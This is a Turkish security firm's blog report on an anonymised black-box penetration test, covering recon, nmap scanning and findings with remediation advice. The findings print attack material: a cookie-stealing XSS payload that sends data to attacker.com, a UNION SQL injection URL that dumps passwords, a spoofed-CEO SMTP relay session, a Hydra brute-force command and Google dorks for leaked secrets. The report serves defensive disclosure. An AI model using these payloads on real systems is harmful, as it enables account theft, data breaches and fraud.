Yayın Tarihi: 25 Nisan 2025
2025 yılının Mart ayında gerçekleştirdiğimiz kapsamlı sızma testi çalışması, kurumsal bir müşterimizin dışa açık sistemlerinin güvenlik seviyesinin derinlemesine analiz edilmesini hedeflemiştir. Bu makalede, sızma testi sürecimizi, kullandığımız metodolojileri ve elde ettiğimiz kritik bulguları paylaşarak, kurumların kendi güvenlik altyapılarını değerlendirmelerine yardımcı olmayı amaçlıyoruz.
Çalışmalarımız, Black Box (Siyah Kutu) metodolojisi ile yürütülmüş olup, test sürecinde yalnızca kamuya açık kaynaklardan edinilebilecek bilgiler kullanılmıştır. Bu yaklaşım, gerçek dünya saldırganlarının kullanabileceği teknikleri daha gerçekçi bir şekilde simüle etmemize olanak tanımıştır. Bütün testler, PTES (Penetration Testing Execution Standard) ve OSSTMM (Open Source Security Testing Methodology Manual) çerçevelerinde, etik kurallar gözetilerek gerçekleştirilmiştir.
Müşteri ile yapılan kapsamlı planlama toplantıları neticesinde, aşağıdaki sistemler ve servisler test kapsamına dahil edilmiştir:
Aktif tarama ve test işlemlerine geçmeden önce, kapsamlı bir pasif keşif süreci yürütülmüştür. Bu adımda, hedef sistemlere herhangi bir trafik gönderilmeden veya doğrudan etkileşime geçilmeden enformasyon toplanması amaçlanmıştır:
Alan Adı Analizi ve Recon-ng Taramaları
Hedef kurum ile ilişkili tüm alan adları, alt alan adları ve ilişkili IP blokları haritalandırılmıştır. Bu süreçte Recon-ng, Sublist3r, Amass gibi gelişmiş keşif araçları kullanılmıştır.
OSINT (Open Source Intelligence) Araştırması
Personel ve organizasyon yapısı hakkında sosyal medya profilleri, profesyonel ağlar (LinkedIn vb.) ve çeşitli internet kaynaklarından bilgi toplanmıştır.
Whois, DNS ve SSL Sertifika Analizi
DNS kayıtları ve tarihsel Whois verileri incelenmiş, SSL sertifikalarından elde edilen alt alan adları ve organizasyon yapısı bilgileri değerlendirilmiştir. Certificate Transparency logları üzerinden analiz gerçekleştirilmiştir.
Gelişmiş Google Dork Teknikleri
Aşağıdaki özel arama operatörleri kullanılarak hassas kurum verilerinin internet üzerinde potansiyel sızıntıları araştırılmıştır:
site:hedefalan.com filetype:pdf confidential
site:hedefalan.com inurl:admin | login | portal | intranet
site:github.com "hedefalan.com" password | api_key | secret
site:pastebin.com "hedefalan.com"
Veri İhlali ve Sızıntı Analizleri
HaveIBeenPwned, DeHashed ve benzer veri tabanları üzerinden kurumsal e-posta adresleri ile ilişkili potansiyel veri sızıntıları araştırılmıştır.
Teknoloji İstifleri ve Yazılım Versiyonları
Wappalyzer, BuiltWith gibi araçlar kullanılarak hedef sistemlerin teknoloji altyapısı, yazılım bileşenleri ve muhtemel versiyonları belirlenmiştir.
Pasif keşif aşamasının ardından, elde edilen bilgiler ışığında hedeflenen sistemler üzerinde kontrollü aktif tarama ve keşif çalışmaları yürütülmüştür:
Ağ Haritalandırma ve Port Taraması
Belirlenen IP bloklarında kapsamlı port taramaları gerçekleştirilmiştir. Taramalar, ağ trafiğini minimize edecek şekilde aşamalı olarak yürütülmüştür:
# İlk aşama - Hızlı SYN taraması (1000 yaygın port)
nmap -sS -T4 --top-ports 1000 -oA quick_scan 192.168.1.0/24
# İkinci aşama - Hedeflenen makinelerde tam port taraması
nmap -sS -p- -T4 --max-retries 1 --max-scan-delay 20 -oA full_scan 192.168.1.100
# Üçüncü aşama - Servis ve versiyon tespiti
nmap -sV -sC -p21,22,80,443,8080 -oA service_scan 192.168.1.100
# UDP taramaları (önemli servisler)
nmap -sU -p53,67,123,161,500 -oA udp_scan 192.168.1.100
Servis Enumerasyonu ve Versiyon Tespiti
Tespit edilen açık portlar üzerinde çalışan servisler ve bunların versiyonları detaylı olarak belirlenmiştir. Özellikle, yaygın olarak kullanılan web sunucuları (Apache, Nginx, IIS), veritabanı servisleri (MySQL, MSSQL, PostgreSQL) ve uzak erişim servisleri (SSH, RDP, VNC) odaklı taramalar gerçekleştirilmiştir.
Otomatize Zafiyet Taramaları
Tespit edilen sistemler üzerinde aşağıdaki araçlar kullanılarak kapsamlı zafiyet analizleri yapılmıştır:
Gerçekleştirilen sızma testi çalışmaları neticesinde aşağıdaki kritik bulgular tespit edilmiştir. Her bulgu için CVSS v3.1 skorları hesaplanmış ve risk derecelendirmesi yapılmıştır.
CVSS Skoru: 8.6 (Yüksek)
Detay: mail.hedefalan.com adresinde çalışan Postfix mail sunucusunda, yetkisiz kullanıcıların kurum adına e-posta gönderimi yapabilmesine olanak tanıyan açık relay konfigürasyonu tespit edilmiştir. Bu yapılandırma hatası, kurum adına oltalama (phishing) ve spam faaliyetleri yürütülmesine imkan tanımaktadır.
İstismar Senaryosu: Test kapsamında, aşağıdaki komut kullanılarak SMTP sunucusu üzerinden yetkisiz e-posta gönderimi gerçekleştirilmiştir:
telnet mail.hedefalan.com 25
HELO attacker.com
MAIL FROM: ceo@hedefalan.com
RCPT TO: victim@example.com
DATA
From: "CEO" <ceo@hedefalan.com>
Subject: Urgent Financial Transfer
Please transfer $10,000 to the following account...
.
QUIT
Çözüm Önerisi: SMTP sunucularında IP tabanlı erişim kısıtlamaları uygulanmalı, SPF, DKIM ve DMARC yapılandırmaları eksiksiz olarak yapılmalı, e-posta relay politikaları revize edilmeli ve kimlik doğrulama mekanizması zorunlu hale getirilmelidir.
CVSS Skoru: 7.4 (Yüksek)
Detay: Kurumsal portal uygulamasındaki kullanıcı profil sayfasında, "Şirket Bilgisi" alanında yetersiz input sanitization nedeniyle Stored XSS zafiyeti tespit edilmiştir. Bu zafiyet, saldırganların kötü amaçlı JavaScript kodlarını sisteme enjekte etmesine ve diğer kullanıcıların tarayıcılarında bu kodların çalıştırılmasına olanak tanımaktadır.
İstismar Kanıtı:
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://attacker.com/steal?cookie=" + document.cookie, true);
xhr.send();
</script>
Bu kod, profil sayfasına eklendiğinde, sayfayı ziyaret eden tüm kullanıcıların çerez bilgilerini saldırganın kontrol ettiği sunucuya iletmektedir.
Çözüm Önerisi:
CVSS Skoru: 9.1 (Kritik)
Detay: İntranet portalının arama fonksiyonunda parametre değerlerinin doğrudan SQL sorgularına dahil edilmesi nedeniyle SQL Injection zafiyeti tespit edilmiştir. Bu zafiyet, saldırganların veritabanı üzerinde yetkisiz sorgular çalıştırmasına ve potansiyel olarak hassas verilere erişim sağlamasına olanak tanımaktadır.
İstismar Örneği:
https://intranet.hedefalan.com/search?term=test' UNION SELECT username,password,NULL,NULL FROM users--
Bu URL'nin ziyaret edilmesi, kullanıcı adları ve şifre hash'lerini içeren veritabanı tablosundaki verileri sızdırmaktadır.
Uzman Görüşü: "SQL Injection zafiyetleri, OWASP Top 10 listesinde uzun yıllardır yer almasına rağmen, halen en yaygın ve en tehlikeli güvenlik açıklarından biridir. Özellikle hazır sistemlere eklenen özel modüllerde ve legacy uygulamalarda sıklıkla karşılaşılmaktadır. Prepared statement kullanımı ve ORM framework'lerinin doğru implementasyonu, bu tür zafiyetleri önlemenin en etkili yoludur." - Siber Güvenlik Analisti, OSCP, CEH
Çözüm Önerisi:
CVSS Skoru: 8.2 (Yüksek)
Detay: Web sunucularında Apache 2.4.29 sürümünün kullanıldığı ve bu sürümün çeşitli uzaktan kod çalıştırma zafiyetlerine karşı savunmasız olduğu tespit edilmiştir. Özellikle mod_lua modülündeki bellek yönetimi hatası (CVE-2021-44790), saldırganların uzaktan kod çalıştırmasına imkan tanımaktadır.
Proof of Concept: Test ortamında, Metasploit çerçevesi kullanılarak ilgili CVE'yi hedefleyen bir exploit modülü çalıştırılmış ve sunucu üzerinde yetkisiz komut çalıştırma imkanı doğrulanmıştır.
Çözüm Önerisi: Apache web sunucusunun en güncel kararlı sürüme (2.4.58 veya daha yeni) yükseltilmesi, gereksiz modüllerin devre dışı bırakılması ve güvenlik yamalarının düzenli olarak uygulanması için bir yama yönetim süreci oluşturulması.
CVSS Skoru: 7.5 (Yüksek)
Detay: Sistemlerde kullanılan OpenSSL 1.1.1k sürümünde X.400 adresi ayrıştırma zafiyeti tespit edilmiştir. Bu zafiyet, özellikle TLS sertifika doğrulama süreçlerinde potansiyel olarak Man-in-the-Middle saldırılarına imkan tanımaktadır.
Çözüm Önerisi: OpenSSL kütüphanesinin 1.1.1t veya daha yeni bir sürüme güncellenmesi, TLS yapılandırmalarının sıkılaştırılması ve düzenli güvenlik taramaları ile kütüphane güncelliklerinin takip edilmesi.
CVSS Skoru: 7.2 (Yüksek)
Detay: VPN gateway ve bazı yönetim arayüzlerinde zayıf parola kullanımı ve brute force saldırılarına karşı koruma mekanizmalarının yetersizliği tespit edilmiştir. Özellikle, VPN erişimi için kullanılan test hesaplarında tahmin edilebilir ve çeşitli sızıntı veri tabanlarında yer alan parolalar kullanıldığı görülmüştür.
İstismar Senaryosu: Hydra aracı kullanılarak VPN erişim paneline yönelik otomatize brute force saldırısı düzenlenmiş ve belirli hesapların parolaları başarıyla elde edilmiştir:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt vpn.hedefalan.com https-post-form "/login:username=^USER^&password=^PASS^:F=Login failed"
Çözüm Önerisi:
Test sürecinde, tespit edilen zafiyetlerin gerçek saldırı senaryolarında nasıl kullanılabileceğini göstermek amacıyla kontrollü istismar çalışmaları gerçekleştirilmiştir. Bu çalışmaların tümü, minimum etki prensibi gözetilerek ve müşteri onayı doğrultusunda yürütülmüştür.
İntranet uygulamasının yönetici panelinde tespit edilen Insecure Direct Object Reference (IDOR) zafiyeti kullanılarak standart kullanıcı hesabından yönetici yetkilerine yükseltme gerçekleştirilmiştir:
role=standard
parametresi role=admin
olarak değiştirildiBu zafiyet, backend'de yetersiz yetkilendirme kontrolü ve client-side veri manipülasyonuna karşı koruma eksikliğinden kaynaklanmaktadır.
VPN erişimi üzerinden internal ağa sızılmış ve aşağıdaki pivot teknikleri kullanılarak ağ içinde yanal hareket gerçekleştirilmiştir:
Bu senaryo, her aşamada müşteri bilgilendirmesi yapılarak ve sistem operasyonlarına zarar vermeyecek şekilde yürütülmüştür.
Test sürecinde tespit edilen zafiyetler doğrultusunda, üç aşamalı bir güvenlik iyileştirme stratejisi önerilmektedir:
Kritik Sistemlerin Yamalanması
Kimlik Doğrulama Mekanizmalarının Güçlendirilmesi
Acil Erişim Kontrolü İyileştirmeleri
Savunma Derinliği Stratejisi
Güvenlik İzleme ve Olay Yönetimi
DevSecOps Entegrasyonu
Kurumsal Güvenlik Mimarisi Revizyonu
Sürekli Güvenlik Doğrulama Programı
Güvenlik Olgunluk Modeli Uyumluluğu
Yürütülen kapsamlı sızma testi çalışması, kurumun dışa açık altyapısında çeşitli güvenlik açıkları tespit edilmesini sağlamıştır. Bu açıkların önceliklendirilmiş bir şekilde giderilmesi, kurumun siber güvenlik duruşunu önemli ölçüde güçlendirecektir.
Test sürecinde öne çıkan önemli bulgular şunlardır:
Saldırı Yüzeyinin Genişliği: Tespit edilen 178 alt alan adı ve 6 farklı bulut ortamında dağıtık servislerin varlığı, saldırı yüzeyinin beklenenden geniş olduğunu göstermiştir.
Legacy Sistemlerin Güvenlik Riskleri: Kurum altyapısında halen aktif olarak kullanılan eski sistemler ve yazılımlar, modern güvenlik pratiklerinin uygulanmasını zorlaştırmakta ve risk oluşturmaktadır.
Güvenlik Duruşu Farkındalığı: Güvenlik taraması sonuçlarına göre, kurumun dışarıdan görünürlüğünü ve dijital ayak izini yönetme konusunda stratejik bir yaklaşıma ihtiyaç duyduğu tespit edilmiştir.
Entegre Güvenlik Yaklaşımı İhtiyacı: Farklı sistemler ve platformlar arasında tutarlı güvenlik politikalarının uygulanması ve merkezi bir güvenlik yönetim stratejisinin geliştirilmesi kritik önem taşımaktadır.
Tespit edilen zafiyetler, kurum varlıklarının potansiyel olarak tehdit aktörleri tarafından hedef alınabilecek güvenlik açıklarına sahip olduğunu göstermektedir. Ancak, bu raporda belirtilen önerilerin uygulanması ve proaktif bir güvenlik stratejisinin benimsenmesi ile kurumun siber dayanıklılığının önemli ölçüde artırılması mümkündür.
Bu blog yazısı, gerçek bir sızma testi senaryosuna dayalı olmakla birlikte, gizlilik ve güvenlik gereksinimlerini korumak amacıyla belirli detaylar anonimleştirilmiş ve değiştirilmiştir. Tüm teknik ve metodolojik bilgiler yalnızca eğitim ve farkındalık amaçlıdır. Yazıda sunulan teknik ve araçların kötü niyetli kullanımı yasal değildir ve etik dışıdır.
Güvenlik, sadece bir teknoloji değil; aynı zamanda doğru süreçler ve farkındalık kültürüdür.
Bilgi Güvenliği YaklaşımıCopyright © 2024 Betay Bilişim
Yorum Yap
E-posta adresiniz yorumunuzda yayınlanmayacaktır.